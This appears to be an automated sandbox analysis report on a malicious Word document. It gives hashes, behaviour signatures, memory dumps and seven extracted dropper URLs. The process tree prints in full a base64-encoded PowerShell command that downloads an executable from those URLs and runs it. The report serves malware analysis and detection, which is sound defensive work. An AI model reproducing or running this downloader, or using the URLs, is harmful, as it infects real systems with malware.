Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    23-05-2024 00:28

General

  • Target

    621c5e53d558797d0e4494eed4fa9cd1JaffaCakes118.doc

  • Size

    187KB

  • MD5

    621c5e53d558797d0e4494eed4fa9cd1

  • SHA1

    843fd69f28b862b75bc8cb9028b0bc009e907caa

  • SHA256

    fc8aa6f97026b3ab9940022d409504d275d0dd4a9a1cb02ce00fde0ab46f54be

  • SHA512

    70415120b6190e020069ad5942708826e7f043be794e875593da385029a67c204ce7098122e739149fec08e04ebdf41c6265dc7feee6c568e67acd210023dc4d

  • SSDEEP

    1536:tGGGGGGGGGG2xJLEt+LaaGGGGGGGGGGjLo9xildYXY9YgddT/Ephoj18sov8sCAd:zrfrzOH98ipg4ejZ

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://scrappy.upsproutmedia.com/wp-admin/J/

exe.dropper

https://china-specialist.com/wp-content/YrLG/

exe.dropper

https://www.upsproutmedia.com/wp-admin/M/

exe.dropper

http://pagearrow.com/wordpress/B/

exe.dropper

http://a.xuezha.cn/lajop/OYdUzf/

exe.dropper

http://blog.saadata.com/cgi-bin/vwz/

exe.dropper

http://zeeamfashion.com/content/rqoL/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\621c5e53d558797d0e4494eed4fa9cd1JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2940
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1608
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -encod JABQAG8AagBqAGoAdgAzAD0AKAAnAFgAJwArACcAawB3ACcAKwAoACcAOAAnACsAJwBiAGoAcgAnACkAKQA7ACYAKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUATgB2ADoAdQBTAEUAcgBwAFIAbwBmAEkATABFAFwARwBlAGsAVwA2ADQATwBcAEIAQgB5AGoAOQBFAFcAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAHIARQBDAFQAbwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBgAGMAVQByAEkAYABUAHkAUABgAFIAbwB0AG8AYABDAG8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAJwApACsAJwAyACcAKwAoACcALAAgAHQAJwArACcAbABzADEAMQAsACAAJwArACcAdAAnACkAKwAnAGwAcwAnACkAOwAkAFAAagB1ADAAdABlAG0AIAA9ACAAKAAnAE4AZwAnACsAJwBxACcAKwAoACcAcQB2AGwAJwArACcAZAB5ACcAKQApADsAJABXAGIAMwBrADgAYQByAD0AKAAoACcARABuAGUAJwArACcANgBkAGUAJwApACsAJwB5ACcAKQA7ACQATABsAF8AYwA1ADkAZgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwBvACcAKwAoACcATgBtAEcAJwArACcAZQBrAHcANgAnACsAJwA0AG8AJwArACcAbwBOACcAKQArACgAJwBtAEIAYgAnACsAJwB5AGoAOQAnACkAKwAoACcAZQAnACsAJwB3AG8ATgAnACkAKwAnAG0AJwApACAALQBjAFIARQBwAGwAYQBDAEUAKABbAEMASABhAFIAXQAxADEAMQArAFsAQwBIAGEAUgBdADcAOAArAFsAQwBIAGEAUgBdADEAMAA5ACkALABbAEMASABhAFIAXQA5ADIAKQArACQAUABqAHUAMAB0AGUAbQArACgAJwAuACcAKwAoACcAZQB4ACcAKwAnAGUAJwApACkAOwAkAFgAMQB2AGcAcgBkADMAPQAoACgAJwBDADEAJwArACcAMwB6AGYANgAnACkAKwAnAGsAJwApADsAJABHAHQAbQAxAHUAagB5AD0ALgAoACcAbgBlAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABOAGUAVAAuAFcAZQBiAGMAbABJAEUAbgBUADsAJABJAGMAaQBoAGcAdgBpAD0AKAAnAGgAJwArACgAJwB0AHQAJwArACcAcABzADoAJwApACsAJwAvAC8AJwArACcAcwBjACcAKwAoACcAcgAnACsAJwBhAHAAcAB5ACcAKQArACcALgB1ACcAKwAoACcAcAAnACsAJwBzAHAAcgAnACsAJwBvAHUAJwArACcAdABtAGUAZAAnACsAJwBpAGEALgBjAG8AbQAnACsAJwAvAHcAJwApACsAKAAnAHAAJwArACcALQBhACcAKQArACgAJwBkACcAKwAnAG0AaQBuACcAKwAnAC8ASgAvACoAaAAnACkAKwAoACcAdAB0AHAAJwArACcAcwA6ACcAKwAnAC8AJwArACcALwBjAGgAJwArACcAaQBuAGEALQBzACcAKQArACgAJwBwACcAKwAnAGUAYwBpAGEAbABpACcAKwAnAHMAdAAuACcAKwAnAGMAbwBtAC8AdwAnACkAKwAoACcAcAAnACsAJwAtAGMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBlACcAKwAnAG4AdAAvAFkAJwApACsAKAAnAHIATABHACcAKwAnAC8AJwApACsAJwAqACcAKwAoACcAaAAnACsAJwB0AHQAJwApACsAKAAnAHAAcwAnACsAJwA6AC8AJwApACsAKAAnAC8AdwAnACsAJwB3ACcAKQArACgAJwB3AC4AdQAnACsAJwBwACcAKQArACgAJwBzAHAAcgAnACsAJwBvAHUAdAAnACkAKwAnAG0AJwArACcAZQAnACsAJwBkAGkAJwArACgAJwBhACcAKwAnAC4AYwBvAG0ALwAnACsAJwB3AHAAJwApACsAKAAnAC0AYQAnACsAJwBkAG0AJwArACcAaQBuACcAKwAnAC8ATQAvACcAKQArACcAKgAnACsAKAAnAGgAJwArACcAdAB0AHAAOgAnACkAKwAoACcALwAvACcAKwAnAHAAYQBnAGUAJwArACcAYQByACcAKQArACgAJwByACcAKwAnAG8AdwAuACcAKQArACcAYwBvACcAKwAnAG0ALwAnACsAKAAnAHcAJwArACcAbwByAGQAJwApACsAKAAnAHAAcgAnACsAJwBlAHMAcwAvAEIAJwApACsAJwAvACcAKwAoACcAKgBoACcAKwAnAHQAdABwADoALwAvAGEALgAnACsAJwB4AHUAZQB6ACcAKwAnAGgAJwApACsAKAAnAGEAJwArACcALgBjACcAKQArACcAbgAnACsAJwAvACcAKwAoACcAbAAnACsAJwBhAGoAbwBwAC8ATwAnACsAJwBZAGQAJwApACsAKAAnAFUAegBmACcAKwAnAC8AJwApACsAJwAqACcAKwAoACcAaAB0ACcAKwAnAHQAcAA6ACcAKwAnAC8AJwApACsAKAAnAC8AYgAnACsAJwBsACcAKQArACgAJwBvAGcAJwArACcALgBzAGEAYQAnACkAKwAoACcAZAAnACsAJwBhAHQAYQAuAGMAbwBtACcAKwAnAC8AYwAnACkAKwAoACcAZwBpACcAKwAnAC0AYgBpACcAKQArACcAbgAnACsAKAAnAC8AdgAnACsAJwB3ACcAKQArACgAJwB6ACcAKwAnAC8AKgBoACcAKQArACgAJwB0AHQAcAA6AC8ALwAnACsAJwB6AGUAJwArACcAZQBhACcAKQArACgAJwBtAGYAYQBzAGgAaQBvACcAKwAnAG4ALgAnACsAJwBjAG8AbQAvACcAKQArACcAYwAnACsAKAAnAG8AbgAnACsAJwB0ACcAKQArACcAZQBuACcAKwAnAHQAJwArACcALwAnACsAJwByACcAKwAnAHEAJwArACcAbwBMACcAKwAnAC8AJwApAC4AIgBTAHAAbABgAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFAAbQBvAHQAXwBjAGEAPQAoACcARAAnACsAKAAnAGsAJwArACcAOAA4AG0AJwApACsAJwAxAHEAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAUgA3AHUAeQB2ADYAOQAgAGkAbgAgACQASQBjAGkAaABnAHYAaQApAHsAdAByAHkAewAkAEcAdABtADEAdQBqAHkALgAiAGQAYABPAHcATgBsAE8AYQBEAEYASQBgAEwAZQAiACgAJABSADcAdQB5AHYANgA5ACwAIAAkAEwAbABfAGMANQA5AGYAKQA7ACQAVQBkAHkAdwB0AHIAcQA9ACgAKAAnAEcAaABpAGgAJwArACcAagAnACkAKwAnADQAJwArACcAcwAnACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQATABsAF8AYwA1ADkAZgApAC4AIgBsAGUAbgBgAGcAdABoACIAIAAtAGcAZQAgADIANQA4ADUAMAApACAAewAmACgAJwBJAG4AdgBvAGsAZQAtACcAKwAnAEkAJwArACcAdABlAG0AJwApACgAJABMAGwAXwBjADUAOQBmACkAOwAkAFcAagAyADEAZQBuADYAPQAoACcASQBiACcAKwAoACcAaAAnACsAJwBnADcAJwApACsAJwBqAG4AJwApADsAYgByAGUAYQBrADsAJABTADgAYwBnAHoAMwBlAD0AKAAoACcAUQAnACsAJwBrADQANgAnACkAKwAnADUAXwAnACsAJwBtACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUQA1AHIAcQAxAG0AeAA9ACgAJwBWACcAKwAnADgAaAAnACsAKAAnAHEAagB2ACcAKwAnAG8AJwApACkA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2624

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      d0c3328ae214d6f54ec84f4877cba391

      SHA1

      eec36d327c5a91d676b4e15f1ee53e3696c6ea59

      SHA256

      86e0fa0d3fdbfeffd21b1bd560ad653b20d5fd5517156ae189782ae6b3b2cd59

      SHA512

      31b40cb765fb0c69c420799f44c9ac43dc874ddca2e30fb0ba55f94fe1c2ce62811d16532dab4a31cd348d3dd015a05b119b5a5db8bdfcb2819344ff60fc575e

    • memory/2624-40-0x000000001B7D0000-0x000000001BAB2000-memory.dmp
      Filesize

      2.9MB

    • memory/2624-41-0x0000000001EC0000-0x0000000001EC8000-memory.dmp
      Filesize

      32KB

    • memory/2940-33-0x00000000059D0000-0x0000000005AD0000-memory.dmp
      Filesize

      1024KB

    • memory/2940-6-0x0000000000390000-0x0000000000490000-memory.dmp
      Filesize

      1024KB

    • memory/2940-8-0x0000000005C00000-0x0000000005D00000-memory.dmp
      Filesize

      1024KB

    • memory/2940-9-0x0000000000390000-0x0000000000490000-memory.dmp
      Filesize

      1024KB

    • memory/2940-19-0x00000000059D0000-0x0000000005AD0000-memory.dmp
      Filesize

      1024KB

    • memory/2940-18-0x00000000059D0000-0x0000000005AD0000-memory.dmp
      Filesize

      1024KB

    • memory/2940-32-0x00000000059D0000-0x0000000005AD0000-memory.dmp
      Filesize

      1024KB

    • memory/2940-0-0x000000002FB11000-0x000000002FB12000-memory.dmp
      Filesize

      4KB

    • memory/2940-34-0x00000000059D0000-0x0000000005AD0000-memory.dmp
      Filesize

      1024KB

    • memory/2940-7-0x0000000000390000-0x0000000000490000-memory.dmp
      Filesize

      1024KB

    • memory/2940-2-0x0000000070D0D000-0x0000000070D18000-memory.dmp
      Filesize

      44KB

    • memory/2940-48-0x0000000070D0D000-0x0000000070D18000-memory.dmp
      Filesize

      44KB

    • memory/2940-51-0x0000000000390000-0x0000000000490000-memory.dmp
      Filesize

      1024KB

    • memory/2940-52-0x0000000005C00000-0x0000000005D00000-memory.dmp
      Filesize

      1024KB

    • memory/2940-53-0x00000000059D0000-0x0000000005AD0000-memory.dmp
      Filesize

      1024KB

    • memory/2940-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2940-69-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2940-70-0x0000000070D0D000-0x0000000070D18000-memory.dmp
      Filesize

      44KB

    • memory/2940-71-0x0000000000390000-0x0000000000490000-memory.dmp
      Filesize

      1024KB